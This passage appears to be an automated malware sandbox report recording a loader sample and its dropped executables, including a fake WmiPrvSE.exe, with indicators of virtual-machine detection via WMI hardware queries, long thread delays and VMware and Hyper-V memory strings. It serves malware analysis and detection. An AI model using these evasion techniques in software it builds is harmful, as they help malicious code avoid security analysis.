            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeMemory allocated: 1B410000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1A60000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1B3C0000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: A00000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1A650000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1160000 memory reserve | memory write watch
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeMemory allocated: 1AE70000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1330000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1AE80000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 13B0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: E10000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1A850000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: BF0000 memory reserve | memory write watch
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMemory allocated: 1A900000 memory reserve | memory write watch
            Source: C:\msPortRefnetdhcp\componentWininto.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599874
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599765
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599863
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599750
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599641
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599531
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599883
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599781
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599891
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599766
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\msPortRefnetdhcp\componentWininto.exeWindow / User API: threadDelayed 2079Jump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 366
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 367
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeWindow / User API: threadDelayed 637
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1168
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1328
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 668
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1755
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1171
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1161
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 660
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow / User API: threadDelayed 1856
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7412Thread sleep count: 2079 > 30Jump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7404Thread sleep count: 43 > 30Jump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exe TID: 7388Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7184Thread sleep count: 366 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 4412Thread sleep count: 367 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7968Thread sleep count: 637 > 30
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7968Thread sleep count: 1168 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7968Thread sleep count: 1328 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -599874s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1144Thread sleep time: -599765s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 8160Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 1364Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 4268Thread sleep count: 668 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 3752Thread sleep count: 1755 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599863s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599750s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599641s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 5040Thread sleep time: -599531s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7828Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 3220Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6160Thread sleep count: 1171 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6172Thread sleep count: 1161 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -599883s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6788Thread sleep time: -599781s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 6384Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 908Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7104Thread sleep count: 660 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 4312Thread sleep count: 1856 > 30
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -599891s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7820Thread sleep time: -599766s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7432Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe TID: 7172Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0027A5F4
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0028B8E0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028DD72 VirtualQuery,GetSystemInfo,3_2_0028DD72
            Source: C:\msPortRefnetdhcp\componentWininto.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599874
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599765
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599863
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599750
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599641
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599531
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599883
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599781
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 600000
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599891
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 599766
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeThread delayed: delay time: 922337203685477
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\userJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: w32tm.exe, 00000017.00000002.1792732897.0000022AB9A79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630
            Source: WmiPrvSE.exe, 00000026.00000002.3308703399.000000001D000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&es
            Source: CyberLoader.exe, 00000003.00000003.1641748583.00000000031D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000
            Source: componentWininto.exe, 00000008.00000002.2223794045.000000001C4EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r-0
            Source: WmiPrvSE.exe, 00000023.00000002.3077537785.000000001CF80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9
            Source: WmiPrvSE.exe, 00000023.00000002.3077537785.000000001CF80000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3510931910.000000001C950000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3740806232.000000001C9F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
